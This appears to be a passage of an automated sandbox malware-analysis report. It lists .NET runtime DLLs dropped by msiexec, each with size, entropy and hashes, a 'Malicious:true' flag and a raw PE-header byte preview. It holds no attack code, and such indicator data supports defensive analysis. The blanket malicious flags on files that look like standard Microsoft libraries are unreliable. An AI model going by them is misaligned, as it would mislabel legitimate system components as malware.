                                                                                                                                                                                                                                        Size (bytes):2983600
                                                                                                                                                                                                                                        Entropy (8bit):6.812192303137626
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:QGXvwoaHeJ4TJYdj/Ic8u07EPba92I7aE0Vnv1XgVi4nNmccxbDpBsnTzkt2By6:FXIle6lscc+mxEx
                                                                                                                                                                                                                                        MD5:03E0F23A9AFFBE826691D59679FC59D9
                                                                                                                                                                                                                                        SHA1:629C03AC4766F367D21F6C8C9661DB55B7C8181E
                                                                                                                                                                                                                                        SHA-256:2798A9381AF5A44D712F2DDCF8CF123F9BFE9CA2514DD1997595D58F4B6CF6BE
                                                                                                                                                                                                                                        SHA-512:918EFE2983F2BE6105321414CFAC95ED629CAEBDA037EC64497EAF4BDC43D26DF1DF1E47FC2F073044854DD3E53CC45DD5348C8DBC8A2AE41EA55CC41818A8E8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....r+...................................................-.......-...`...@......@............... ..................................t....&...K...^-..(...`-..&......T...........................................................x...H............text....p+......r+................. ..`.data.........+......t+.............@....reloc...&...`-..(...6-.............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...>.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.a.t.a...C.o.m.m.o.n.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...N.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...D.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.DataSetExtensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.654164203598564
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CILuSHbxjWa07W7YA6VFHRN7O049R9zaxW8:LuPwFClO069zQW8
                                                                                                                                                                                                                                        MD5:D4DB1A835333B83021EDBD1EDEB6D27B
                                                                                                                                                                                                                                        SHA1:2C02C06D2C5833E9D4C7B9A39B411E8478F0E016
                                                                                                                                                                                                                                        SHA-256:9B6A7F9CD4931CC9D5186F72A9159D23F72ECF41DF5F8839B032CE16BA37EBB2
                                                                                                                                                                                                                                        SHA-512:2458D1AE4D2520FE1EC682BDEE5B6CBDE06614FB27CFE5357E35C8E2BAEA2B9A8FE7321ED9926BC3667F225010D12EC63C862CB582A874041B98963174139DEB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%............."!..0..............)... ........@.. ...............................|....`..................................)..O....@...................(...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ .. ...................P ......................................C..g9..xrD .l...?+ES....d2DeGs.+p..5!......F..N.......~....,.J....t;....E>.b.]4...SQ^..(...d>`..=.......D.}.[.`..&.]..&...4BSJB............v4.0.30319......`...H...#~......X...#Strings............#GUID...........#Blob......................3................................................E...............................:...'.A...i.A.....A...~.A.....A.....A.....A...e.A.....A...........E.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25760
                                                                                                                                                                                                                                        Entropy (8bit):6.240856087154136
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wBaJC9XmGP2SoxDZQe/9hyWiWFWiYA6VFHRN7I/6fR9z+A7:wwsXmJDZQIbFClv9zh7
                                                                                                                                                                                                                                        MD5:66CBA8908CCE9E4119AA1262BC47154F
                                                                                                                                                                                                                                        SHA1:20AAD849038632117C90B367F470E41845F21F34
                                                                                                                                                                                                                                        SHA-256:A9EEB0AA352B4D59A050ED8299CE9D901DEBAF83E9E5FADA36AEA1BD0194554C
                                                                                                                                                                                                                                        SHA-512:1503DCCC3BAA87B3CE87CAF17E926DCD4308B2CEDAC90E9552671F6CB41508506A12DB3BF1262B1ACAFCC8AD4C4B1A713D963A2547C0A61C241C6DDD5E947745
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..2...........P... ...`....... ....................................`..................................P..O....`..8............<...(...........O..T............................................ ............... ..H............text....0... ...2.................. ..`.rsrc...8....`.......4..............@..@.reloc...............:..............@..B.................P......H.......P ......................HO......................................BSJB............v4.0.30319......l.......#~......0...#Strings.... ,......#US.$,......#GUID...4,......#Blob............T.........3....................................<.....[...............:.................A...........o...........!...........R.....Z.....w............................... ...........#...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.777665372573317
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:D9teWZPxxe3sW6r2WnpWjA6Kr4PFHnhWgN7aIWe8/KIjwX01k9z3A8Pl4:5EWzA3sW6r2WnYA6VFHRN7dbHR9z794
                                                                                                                                                                                                                                        MD5:C46E8A594D74758F7B3687CAF3926A27
                                                                                                                                                                                                                                        SHA1:ADE52D2084F59DF1C8AF87838B6FB28CDB2FEC28
                                                                                                                                                                                                                                        SHA-256:8AC0FFAABC3F3265B4CB9FA0A301D11B51A46DC912111CBC28ABFA2F2586B9CD
                                                                                                                                                                                                                                        SHA-512:D76A401A8A20F3345102DA20770ED598F9FA0DB60175D6483BD15CE4109777EDB95F28BA90EEBABDA960D47D3ECFCC39AA7012F75D32ABB0896B23DD08060C8C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y............."!..0..............+... ........@.. ..............................64....`..................................+..W....@...................(...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P .........................................i...K.5..p.J..[..SfM......r2...d.....0nO?Y...Mc..y.xHRK..}%..7*.W.f&..M...qYa...e...qtD;J%. .F.......6....{qQ...qcnu_...XBSJB............v4.0.30319......`.......#~......H...#Strings....8.......#GUID...H.......#Blob......................3......................................Z.........9.........................,.....{.........F...........5.............................#.....p.........................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.762856659311949
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:NR1bwxx+YW2rmWcpWjA6Kr4PFHnhWgN7a8WW9aqcnCjVi6KrIX01k9z3ALxLwf:NaoYW2rmWcYA6VFHRN7j5w49R9zax0f
                                                                                                                                                                                                                                        MD5:8F3DF1C8A4747BE297926B0E6947A230
                                                                                                                                                                                                                                        SHA1:836967D203FAE86256A5E61C9086DBE4F5D6E35A
                                                                                                                                                                                                                                        SHA-256:F2B8865DCE56FF9064E31939066AEA954F5765C4AE82C852EAE28686DBF9A65F
                                                                                                                                                                                                                                        SHA-512:D4850721E5FA9709B0FA7AF685164DDDD9CD4B3EE8290CA02643C20F4D1B16EAC8E597736D1B02CC4F1DE5753E661EDA8D7D86B47D3850483D8C3617922C2A41
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<............."!..0.............n+... ........@.. ...............................u....`..................................+..W....@...................(...`......`*..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P+......H........ ......................P ...............................................a...[;.;8......%x.3X.tH.....d..M'.".?....w.M...............-*.:.MV.r.)oxh..EJ...1.59O.....n.(.$....N..z.R..$.?6L.vuBSJB............v4.0.30319......`...t...#~..........#Strings............#GUID...........#Blob......................3............................................................o...................4.................;...8.;...].;.....;...F.;.....;... .;.....;.....;.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):380592
                                                                                                                                                                                                                                        Entropy (8bit):6.735675584761259
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:FkrYIYOg3BqTtasHnkWg62wafPoSVsybyCrEVYE9J01Tp1:6G3BkBkwoPACrEVtQJ
                                                                                                                                                                                                                                        MD5:FE19AB7B45430314F9B9406779A5F383
                                                                                                                                                                                                                                        SHA1:2733B7326CC7C5587BE27C93F936590E642D13DE
                                                                                                                                                                                                                                        SHA-256:FD2953B1294DD406194DC06383643C1ECE065852EFC70977E363C5D811A52475
                                                                                                                                                                                                                                        SHA-512:5E72487FA8F4398BC40D6B120578E7A05C47C8E351DFB7845E7BADB7313B903BAB98DDDFF60F9BFBC12E203BCEC5AE8A4085EB16F79BAFC98929EBCF50BA64D6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....s..........." ................................................................;.....`...@......@............... ......................................`....+.......(.......... )..T...............................................................H............text............................... ..`.data....}...0...~..................@....reloc..............................@..B............................................0...........................X.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .C.l.a.s.s.e.s. .t.h.a.t. .a.l.l.o.w. .y.o.u. .t.o. .d.e.c.o.u.p.l.e. .c.o.d.e. .l.o.g.g.i.n.g. .r.i.c.h. .(.u.n.s.e.r.i.a.l.i.z.a.b.l.e.). .d.i.a.g.n.o.s.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35488
                                                                                                                                                                                                                                        Entropy (8bit):6.4777955962711955
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:fWd6V9WHoyr50a+3ZgW1n6lsLiKqFCM1nTrmCwCBZ0oMaPeYA6VFHRN7gR9zpA:DCEpgW9LiKqFCM1n2CwWZZkFClc9z+
                                                                                                                                                                                                                                        MD5:51338B3400E2014F4B2EBB188760F8F8
                                                                                                                                                                                                                                        SHA1:C1EFC054DFA51D6498F2A6C3F44168D98BA5BC58
                                                                                                                                                                                                                                        SHA-256:E8DDBB1ED8BE1094412B0621268EE218A1BDE5DD4CBDD22FB947D1620F58872E
                                                                                                                                                                                                                                        SHA-512:4F4C20A2D7A65C09219F45C8CAAA98BDE04AB71CD30DA8943F87293F9D3C38662DFB3769CE30A264740EC22BF9B33E1148D9B88E72DE55B887F32B0B94F553A7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....{*..........." .....X................................................................`...@......@............... ..................................t...8........b...(......T.......T...........................................................x...H............text....W.......X.................. ..`.data........p.......Z..............@....reloc..T............`..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):290464
                                                                                                                                                                                                                                        Entropy (8bit):6.685216167852544
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:I57mVQTeyklUtrYxgjucNxs9b3NX1PkxAqRS7s03JFRlM:I5iVQTrklUSGjucNjmi03JFRlM
                                                                                                                                                                                                                                        MD5:DC2D85A8707588E1040BF052978CA3CC
                                                                                                                                                                                                                                        SHA1:CC19AF78C206F42CCCEE192BEE5ED854B5601869
                                                                                                                                                                                                                                        SHA-256:423E9CB7C654E1275AF06574E0ECCF600ADD68D35F7A9535DE7C29586A72B977
                                                                                                                                                                                                                                        SHA-512:EBA9BA51D5CD0CD89B3A4B1A1068A2F6DE1C5307FA6559CCA40B918A666D2A4C5DC592BAD2992C8D1035575F76C0FC3F74BD086600A33ACBCBEDE238E840AA16
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........P...............................................p............`...@......@............... ..................................D....m...!...F...(...`......0&..T...........................................................H...H............text...z........................... ..`.data....H.......J..................@....reloc.......`.......@..............@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):36512
                                                                                                                                                                                                                                        Entropy (8bit):6.53012806262516
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:H9jY/q6ejoniqkwx38n9Is/C4STsssssssssiFClkmoQ9zpI:HhY/q6ejoniqjx38n9Ij4SFikmVzpI
                                                                                                                                                                                                                                        MD5:4638B0B06EC5F853D3106C3E793ECE1B
                                                                                                                                                                                                                                        SHA1:D84B90F77DF24BE65B2692B5A6E68B4A934A6CB3
                                                                                                                                                                                                                                        SHA-256:9D25EBA962800F6D7690E51E8BCAFE421FE356B3E295D1EC68DDA7924C079423
                                                                                                                                                                                                                                        SHA-512:8C47A0B2DCCCF797CA00467398DA2645CE99B4B08487BC5100A5B7F875CC737392AE2DD69A57C2532A7AA25AF12B7881F9DEE211AA96EA2520D2D49568905496
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....Z..........................................................M.....`...@......@............... ...............................................f...(..............T...............................................................H............text....X.......Z.................. ..`.data...~....p.......\..............@....reloc...............d..............@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...T.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.i.a.g.n.o.s.t.i.c.s...S.t.a.c.k.T.r.a.c.e...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...d.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60576
                                                                                                                                                                                                                                        Entropy (8bit):6.5394690812701635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:tqvGQZQFio5Dp/YLOzpngBsUb+CSNI8QUQXECID5FH0yFeO+FClJW29zh:tPFT5DpQizNpI8GvIJitiYCzh
                                                                                                                                                                                                                                        MD5:AA215480CCC3324B83FB2ADD6E4856BF
                                                                                                                                                                                                                                        SHA1:774277C64E0CDAF14424081D548B2D3F2B5F7A51
                                                                                                                                                                                                                                        SHA-256:900E8474DE5C8EBE1CE4FABDBE19C1145C429D89C2F2C4F7925849767FC3EF28
                                                                                                                                                                                                                                        SHA-512:537F08CEC9AB09A325D8374D776E8E682C80013BD8DE5F3B505826845607D61159FED887336716F1F53F054AFEFC092991E8D5FDB7E9547AB88945E11874A73E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ................................................................`.....`...@......@............... ..................................4....'..8........(......$.......T...........................................................8...H............text............................... ..`.data...7...........................@....reloc..$...........................@..B............................................0.......................$.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........<.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...n.+...C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.i.a.g.n.o.s.t.i.c.s...T.e.x.t.W.r.i.t.e.r.T.r.a.c.e.L.i.s.t.e.n.e.r.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...~.+...F.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                                        Entropy (8bit):6.692349952151225
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:tVTAaxxe2pWQhUW0WxNzx95jmHnhWgN7aIWNxeKIjwX01k9z3A8N6Xr:3cA82pWQhUWbX6HRN723HR9z76
                                                                                                                                                                                                                                        MD5:D6FE11D82ABE3B49A423C948AFE918AA
                                                                                                                                                                                                                                        SHA1:A00BF039CA892A3802C3BC53F5886F5D6CF77DAA
                                                                                                                                                                                                                                        SHA-256:B25E831533A50791B90C1DD448703E88E36F3957BC2C9F40850A8BB051B5FCBB
                                                                                                                                                                                                                                        SHA-512:3CC0A47C684D07260D430FC61C5924DC0452A14401DDC5E9547FFEBC9DD0F92AE055FDB1C5CCCF16F9EA5513D85C9F1A8A5B2FD991995EAA1D2A0E07DDDA50ED
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....K..........."!..0..............*... ........@.. ....................................`..................................)..K....@...................(...`.......)..8............................................ ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..L...................P .......................................`...a..*Ir.5Lk\3zQX'.5+.lt...h...6<R.....^.&l.........]KyZ....A....D.....g..0J.W.x1B.8.#LO...BaS...q..?c..pj.).../P4..G7BSJB............v4.0.30319......`.......#~..H...H...#Strings............#GUID...........#Blob......................3......................................Z.........s.........................,.....w...N.....F.....0.~...!.~.....~.....~.....~.....~.....~.....~.....~.................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):133296
                                                                                                                                                                                                                                        Entropy (8bit):6.547997172170634
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:8qjAVA3Uak7lkcUpI1dsMvj2OE20esM9eVmiqRIL8OXmty6nzufWrzhK6:8BV7agh3sMaj2SM9eVmiT2ty6zSs06
                                                                                                                                                                                                                                        MD5:51D99AE932F81F3155A5F410249FA4ED
                                                                                                                                                                                                                                        SHA1:A6AE36D863E6E4A0476ED5B8756D4AFA03C6468D
                                                                                                                                                                                                                                        SHA-256:57B710D6EE5585086F4438B864B5BED4738E9F451F21479D785BDF34781C9E76
                                                                                                                                                                                                                                        SHA-512:2F147F7188CEB538125B38E427FD01E9FA957041C45C8C34ABCD9093BB6D8479B6412A13DF09CA9256D6CCD75240EF409AC3A2B5CC7E76E6157F24D044AC5F7C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ......................................................................`...@......@............... ......................................L@...........(..............T...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...D.i.a.g.n.o.s.t.i.c.s...T.r.a.c.e.S.o.u.r.c.e.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16664
                                                                                                                                                                                                                                        Entropy (8bit):6.7213791223858825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:hG5g6pDj+y1xxdPWbcDWGWHtWxNzx95jmHnhWgN7acWZkwKUWX01k9z3A/bUfw:h2+y/3PWbcDW7HuX6HRN7YF2R9zEr
                                                                                                                                                                                                                                        MD5:BAE1EC3B6C385527836D2AB828A0BE1A
                                                                                                                                                                                                                                        SHA1:733BD04B4DF39E38F075FBE75B15AFBCAF5117EE
                                                                                                                                                                                                                                        SHA-256:B1A8899251AAE44D312C44D9FCC8467EED7F112E6812C05A1EB30D3726ABE81C
                                                                                                                                                                                                                                        SHA-512:C6C6CCC8A9680D0AF897508463F9FC15564EE51E46C34699B907359109C14390A27C56FE39542A48AA943579A893625737C43EA9BD216594FA7FE824408262D5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... ..........."!..0.............>-... ........@.. ..............................U.....`..................................,..S....@...................)...`......0,..8............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ -......H........ ..`...................P ....................................../.Z(...tIJ.S.v...j..9+..-.....S..Hp.Q....C...b?w...}ea!...Z.S....i.%.x.8}GaM..8tP.......D#a.Q.01.....D.A........~..t#5.......BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3................................ .....................].........................................m.....q.....D...........P...........*...............................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):130208
                                                                                                                                                                                                                                        Entropy (8bit):6.376283707070365
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:z9PHfhY6c2ZPg52Hzvagb4xfHIKHnT6IdIWDkHLYlN0:hPHfDayzKHm+qYK
                                                                                                                                                                                                                                        MD5:F2B90E6B99089BF12AC1B2BC39658CF7
                                                                                                                                                                                                                                        SHA1:5CC0CBC44A27948C192B3F9E33341443DFCA28AD
                                                                                                                                                                                                                                        SHA-256:AB1B5EBF7F85E57A074F61A01B63333CB19D0DD5765645C38F6DF906556C1059
                                                                                                                                                                                                                                        SHA-512:CD07322A7098A8EDEDC1B8FF28A0B1D38A7992BA8534781975B883528DF64B9CA11EC027E5FC9535E7FD243EF487F6041920ABB46B8E9042604B123CE7A17F67
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
